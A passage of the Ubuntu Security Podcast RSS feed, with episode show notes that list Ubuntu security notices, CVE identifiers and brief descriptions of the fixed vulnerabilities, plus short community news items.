<h3 id="usn-4264-1-django-vulnerability-05-00">[<a href="https://usn.ubuntu.com/4264-1/">USN-4264-1</a>] Django vulnerability [05:00]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7471">CVE-2020-7471</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible SQL injection via the PostgreSQL module if was using the
StringAgg instance</li>
<li>Fixed to sanitize the input before processing it</li>
</ul>
<h3 id="usn-4265-1-usn-4265-2-spamassassin-vulnerabilities-05-29">[<a href="https://usn.ubuntu.com/4265-1/">USN-4265-1</a>, <a href="https://usn.ubuntu.com/4265-2/">USN-4265-2</a>] SpamAssassin vulnerabilities [05:29]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1931">CVE-2020-1931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1930">CVE-2020-1930</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-59/">Episode 59</a> - possible RCE via crafted CF file - 2 more similar
vulnerabilities fixed - again upstream advise should only use trusted
update channels or 3rd parted .cf files</li>
</ul>
<h3 id="usn-4266-1-graphicsmagick-vulnerabilities-06-37">[<a href="https://usn.ubuntu.com/4266-1/">USN-4266-1</a>] GraphicsMagick vulnerabilities [06:37]</h3>
<ul>
<li>7 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-18231">CVE-2017-18231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18230">CVE-2017-18230</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18229">CVE-2017-18229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18219">CVE-2017-18219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17915">CVE-2017-17915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17913">CVE-2017-17913</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17912">CVE-2017-17912</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-55/">Episode 55</a>, <a href="https://ubuntusecuritypodcast.org/episode-57/">Episode 57</a>, <a href="https://ubuntusecuritypodcast.org/episode-59/">Episode 59</a>, <a href="https://ubuntusecuritypodcast.org/episode-60/">Episode 60</a></li>
<li>NULL ptr dereferences -&gt; crash, DoS</li>
<li>Large memory allocation -&gt; crash, DoS</li>
<li>Heap + stack based buffer over-read and over-writes too</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-recent-wawa-breach-07-26">Joe and Alex discuss recent Wawa breach [07:26]</h3>
<ul>
<li><a href="https://krebsonsecurity.com/2020/01/wawa-breach-may-have-compromised-more-than-30-million-payment-cards/">https://krebsonsecurity.com/2020/01/wawa-breach-may-have-compromised-more-than-30-million-payment-cards/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E061.mp3" length="18498167" type="audio/mpeg" /><itunes:duration>19:16</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 60
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-60/</link>
          <pubDate>Thu, 30 Jan 2020 17:12:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>f21f0a310cd9b3b77ec9aed4aba7830629eb3657eee049ddc03e2be9574b0f08fa15d82320b65e0b6a592206f8237b260aba32005dc4b60a69ee7ccbb9f662ee</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 60</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and
  more, plus we look at plans to integrate Ubuntu Security Notices within the
  main ubuntu.com website.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and
  more, plus we look at plans to integrate Ubuntu Security Notices within the
  main ubuntu.com website.
  </itunes:summary>
        <description>  Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and
  more, plus we look at plans to integrate Ubuntu Security Notices within the
  main ubuntu.com website.
  </description>
        <googleplay:description>  Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and
  more, plus we look at plans to integrate Ubuntu Security Notices within the
  main ubuntu.com website.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and
more, plus we look at plans to integrate Ubuntu Security Notices within the
main ubuntu.com website.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>91 unique CVEs addressed</p>
<h3 id="usn-4247-1-usn-4247-2-usn-4247-3-python-apt-vulnerabilities-00-42">[<a href="https://usn.ubuntu.com/4247-1/">USN-4247-1</a>, <a href="https://usn.ubuntu.com/4247-2/">USN-4247-2</a>, <a href="https://usn.ubuntu.com/4247-3/">USN-4247-3</a>] python-apt vulnerabilities [00:42]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM,  Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15796">CVE-2019-15796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15795">CVE-2019-15795</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Could still use md5 to validate downloads - md5 has been broken for a
while now so if md5 hashes were available for a repo then these would be
trusted - instead, verify all hashes</li>
<li>Ensure repository is trusted before downloading from it - in some cases,
could configure repositories that were not trusted and python-apt based
clients would not check trust - so would use it - now always check and
verify unless the repository is specifically configured as trusted</li>
</ul>
<h3 id="usn-4248-1-graphicsmagick-vulnerabilities-02-31">[<a href="https://usn.ubuntu.com/4248-1/">USN-4248-1</a>] GraphicsMagick vulnerabilities [02:31]</h3>
<ul>
<li>10 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-17783">CVE-2017-17783</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17782">CVE-2017-17782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17503">CVE-2017-17503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17502">CVE-2017-17502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17501">CVE-2017-17501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17500">CVE-2017-17500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17498">CVE-2017-17498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16669">CVE-2017-16669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16547">CVE-2017-16547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16545">CVE-2017-16545</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-59/">Episode 59</a>, <a href="https://ubuntusecuritypodcast.org/episode-57/">Episode 57</a>, <a href="https://ubuntusecuritypodcast.org/episode-55/">Episode 55</a> etc</li>
</ul>
<h3 id="usn-4246-1-zlib-vulnerabilities-02-55">[<a href="https://usn.ubuntu.com/4246-1/">USN-4246-1</a>] zlib vulnerabilities [02:55]</h3>
<ul>
<li>4 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-9843">CVE-2016-9843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9842">CVE-2016-9842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9841">CVE-2016-9841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9840">CVE-2016-9840</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Trail of Bits security audit of zlib found various instances of undefined
behaviour in the implementation - pointer increment operations on
undefined memory ranges, shifts by negative indices etc. Unlikely to have
any real world impact.</li>
</ul>
<h3 id="usn-4249-1-e2fsprogs-vulnerability-03-55">[<a href="https://usn.ubuntu.com/4249-1/">USN-4249-1</a>] e2fsprogs vulnerability [03:55]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5188">CVE-2019-5188</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack buffer overflow when e2fsck&rsquo;ing a specially crafted ext4
file-system image</li>
</ul>
<h3 id="usn-4233-2-gnutls-update-04-34">[<a href="https://usn.ubuntu.com/4233-2/">USN-4233-2</a>] GnuTLS update [04:34]</h3>
<ul>
<li>Affecting Xenial, Bionic</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-59/">Episode 59</a> - disabled SHA1 for digital signatures in GnuTLS - this update
adds VERIFY_ALLOW_BROKEN and VERIFY_ALLOW_SIGN_WITH_SHA1 priority strings
so can still use sha1 if really needed</li>
</ul>
<h3 id="usn-4230-2-clamav-vulnerability-05-16">[<a href="https://usn.ubuntu.com/4230-2/">USN-4230-2</a>] ClamAV vulnerability [05:16]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15961">CVE-2019-15961</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-59/">Episode 59</a></li>
</ul>
<h3 id="usn-4250-1-mysql-vulnerabilities-05-34">[<a href="https://usn.ubuntu.com/4250-1/">USN-4250-1</a>] MySQL vulnerabilities [05:34]</h3>
<ul>
<li>14 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2694">CVE-2020-2694</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2686">CVE-2020-2686</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2679">CVE-2020-2679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2660">CVE-2020-2660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2627">CVE-2020-2627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2589">CVE-2020-2589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2588">CVE-2020-2588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2584">CVE-2020-2584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2579">CVE-2020-2579</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2577">CVE-2020-2577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2574">CVE-2020-2574</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2573">CVE-2020-2573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2572">CVE-2020-2572</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2570">CVE-2020-2570</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>New upstream release (5.7.29 - xenial, bionic) (8.0.19 - eoan)</li>
</ul>
<h3 id="usn-4251-1-tomcat-vulnerabilities-06-02">[<a href="https://usn.ubuntu.com/4251-1/">USN-4251-1</a>] Tomcat vulnerabilities [06:02]</h3>
<ul>
<li>2 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17563">CVE-2019-17563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12418">CVE-2019-12418</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4252-1-usn-4252-2-tcpdump-vulnerabilities-06-05">[<a href="https://usn.ubuntu.com/4252-1/">USN-4252-1</a>, <a href="https://usn.ubuntu.com/4252-2/">USN-4252-2</a>] tcpdump vulnerabilities [06:05]</h3>
<ul>
<li>28 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15167">CVE-2019-15167</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15166">CVE-2019-15166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010220">CVE-2019-1010220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19519">CVE-2018-19519</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16452">CVE-2018-16452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16451">CVE-2018-16451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16300">CVE-2018-16300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16230">CVE-2018-16230</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16229">CVE-2018-16229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16228">CVE-2018-16228</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16227">CVE-2018-16227</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14882">CVE-2018-14882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14881">CVE-2018-14881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14880">CVE-2018-14880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14879">CVE-2018-14879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14470">CVE-2018-14470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14469">CVE-2018-14469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14468">CVE-2018-14468</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14467">CVE-2018-14467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14466">CVE-2018-14466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14465">CVE-2018-14465</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14464">CVE-2018-14464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14463">CVE-2018-14463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14462">CVE-2018-14462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14461">CVE-2018-14461</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10105">CVE-2018-10105</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10103">CVE-2018-10103</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16808">CVE-2017-16808</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of buffer overflows and the like in various tcpdump
dissectors - in general you should not run tcpdump on untrusted data -
when run as root, by default tcpdump will drop permissions to the tcpdump
user after opening the capture device so this makes it somewhat safer</li>
</ul>
<h3 id="usn-4253-1-usn-4253-2-linux-kernel-vulnerability-07-30">[<a href="https://usn.ubuntu.com/4253-1/">USN-4253-1</a>, <a href="https://usn.ubuntu.com/4253-2/">USN-4253-2</a>] Linux kernel vulnerability [07:30]</h3>
<ul>
<li>1 CVEs addressed in Bionic (HWE), Eoan (5.3 kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Intel GPU would fail to clear state during context switch - could allow
an info leak between local users - so update driver to forcibly clear
state</li>
</ul>
<h3 id="usn-4255-1-usn-4255-2-linux-kernel-vulnerabilities-08-07">[<a href="https://usn.ubuntu.com/4255-1/">USN-4255-1</a>, USN-4255-2] Linux kernel vulnerabilities [08:07]</h3>
<ul>
<li>2 CVEs addressed in Xenial (HWE), Bionic (4.15 kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7053">CVE-2020-7053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Intel GPU state info leak</li>
<li>Intel GPU driver (i915) UAF - crash / code execution</li>
</ul>
<h3 id="usn-4258-1-linux-kernel-vulnerabilities-08-40">[<a href="https://usn.ubuntu.com/4258-1/">USN-4258-1</a>] Linux kernel vulnerabilities [08:40]</h3>
<ul>
<li>15 CVEs addressed in Bionic (AWS, GCP, GKE) (5.0 kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15291">CVE-2019-15291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19767">CVE-2019-19767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19332">CVE-2019-19332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19252">CVE-2019-19252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19227">CVE-2019-19227</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19082">CVE-2019-19082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19079">CVE-2019-19079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19078">CVE-2019-19078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19077">CVE-2019-19077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19071">CVE-2019-19071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19062">CVE-2019-19062</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19050">CVE-2019-19050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18885">CVE-2019-18885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18683">CVE-2019-18683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15099">CVE-2019-15099</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write in KVM hypervisor via /dev/kvm</li>
<li>Virtual console could allow writes via unimplemented unicode devices -
out of bounds memory access - crash etc</li>
<li>2 separate memory leaks in crypto subsystem on certain failure paths -
local user accessible - DoS via memory exhaustion</li>
<li>NULL ptr deref in Atheros wireless USB driver</li>
</ul>
<h3 id="usn-4254-1-usn-4254-2-linux-kernel-vulnerabilities-09-54">[<a href="https://usn.ubuntu.com/4254-1/">USN-4254-1</a>, <a href="https://usn.ubuntu.com/4254-2/">USN-4254-2</a>] Linux kernel vulnerabilities [09:54]</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (HWE), Xenial (4.4 kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15291">CVE-2019-15291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19332">CVE-2019-19332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19227">CVE-2019-19227</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19063">CVE-2019-19063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19062">CVE-2019-19062</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19057">CVE-2019-19057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18885">CVE-2019-18885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18683">CVE-2019-18683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write in KVM hypervisor via /dev/kvm</li>
<li>Crypto memory leak</li>
<li>Intel GPU info leak</li>
</ul>
<h3 id="usn-4256-1-cyrus-sasl-vulnerability-10-24">[<a href="https://usn.ubuntu.com/4256-1/">USN-4256-1</a>] Cyrus SASL vulnerability [10:24]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19906">CVE-2019-19906</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write due to off-by-one error - originally reported against OpenLDAP
which uses cyrus-sasl and was able to be crashed by an unauthenticated
remote user due to this</li>
</ul>
<h3 id="usn-4236-3-libgcrypt-vulnerability-10-57">[<a href="https://usn.ubuntu.com/4236-3/">USN-4236-3</a>] Libgcrypt vulnerability [10:57]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13627">CVE-2019-13627</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-59/">Episode 59</a> - ECDSA side-channel timing attack</li>
</ul>
<h3 id="usn-4257-1-openjdk-vulnerabilities-11-15">[<a href="https://usn.ubuntu.com/4257-1/">USN-4257-1</a>] OpenJDK vulnerabilities [11:15]</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2659">CVE-2020-2659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2655">CVE-2020-2655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2654">CVE-2020-2654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2604">CVE-2020-2604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2601">CVE-2020-2601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2593">CVE-2020-2593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2590">CVE-2020-2590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2583">CVE-2020-2583</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream release (11.0.6)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="moving-ubuntu-security-notices-to-ubuntu-dot-com-security-11-34">Moving Ubuntu Security Notices to ubuntu.com/security [11:34]</h3>
<ul>
<li>mpt put out a call for feedback on plans to move USNs from usn.ubuntu.com
to ubuntu.com/security/</li>
<li>originally announced as a <a href="https://lists.ubuntu.com/archives/ubuntu-hardened/2019-October/001002.html">plan back in October</a>
on the ubuntu-hardened mailing list</li>
<li>posted a mock-up of the resulting page and called for feedback</li>
<li>this is expected to land in the next few weeks</li>
<li><a href="https://discourse.ubuntu.com/t/security-notices-on-ubuntu-com/14159">https://discourse.ubuntu.com/t/security-notices-on-ubuntu-com/14159</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E060.mp3" length="13112345" type="audio/mpeg" /><itunes:duration>13:39</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 59
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-59/</link>
          <pubDate>Fri, 24 Jan 2020 08:57:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>8c5226e656fef4692233bb39d75e43ecb6afda9c7424fb76b5d55fca10bef921973edeefa7c186a93ddc5a592bce4617ac9bce4c639c4fe4bb9238891be0ae2b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 59</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          After a weeks break we are back to look at updates for ClamAV, GnuTLS,
  nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle
  Roadmap Review sprint for the Ubuntu Security Team
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  After a weeks break we are back to look at updates for ClamAV, GnuTLS,
  nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle
  Roadmap Review sprint for the Ubuntu Security Team
  </itunes:summary>
        <description>  After a weeks break we are back to look at updates for ClamAV, GnuTLS,
  nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle
  Roadmap Review sprint for the Ubuntu Security Team
  </description>
        <googleplay:description>  After a weeks break we are back to look at updates for ClamAV, GnuTLS,
  nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle
  Roadmap Review sprint for the Ubuntu Security Team
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>After a weeks break we are back to look at updates for ClamAV, GnuTLS,
nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle
Roadmap Review sprint for the Ubuntu Security Team</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>73 unique CVEs addressed</p>
<h3 id="usn-4230-1-clamav-vulnerability-01-16">[<a href="https://usn.ubuntu.com/4230-1/">USN-4230-1</a>] ClamAV vulnerability [01:16]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15961">CVE-2019-15961</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Backport latest upstream release (0.102.1) from focal</li>
<li>CPU based DoS when scanning crafted emails - parsing of MIME components
in particular</li>
</ul>
<h3 id="usn-4232-1-graphicsmagick-vulnerabilities-01-52">[<a href="https://usn.ubuntu.com/4232-1/">USN-4232-1</a>] GraphicsMagick vulnerabilities [01:52]</h3>
<ul>
<li>11 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-16353">CVE-2017-16353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16352">CVE-2017-16352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15930">CVE-2017-15930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15277">CVE-2017-15277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14997">CVE-2017-14997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14994">CVE-2017-14994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14733">CVE-2017-14733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14649">CVE-2017-14649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14504">CVE-2017-14504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14314">CVE-2017-14314</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14165">CVE-2017-14165</a> <!-- raw HTML omitted --></li>
</ul>
</li>
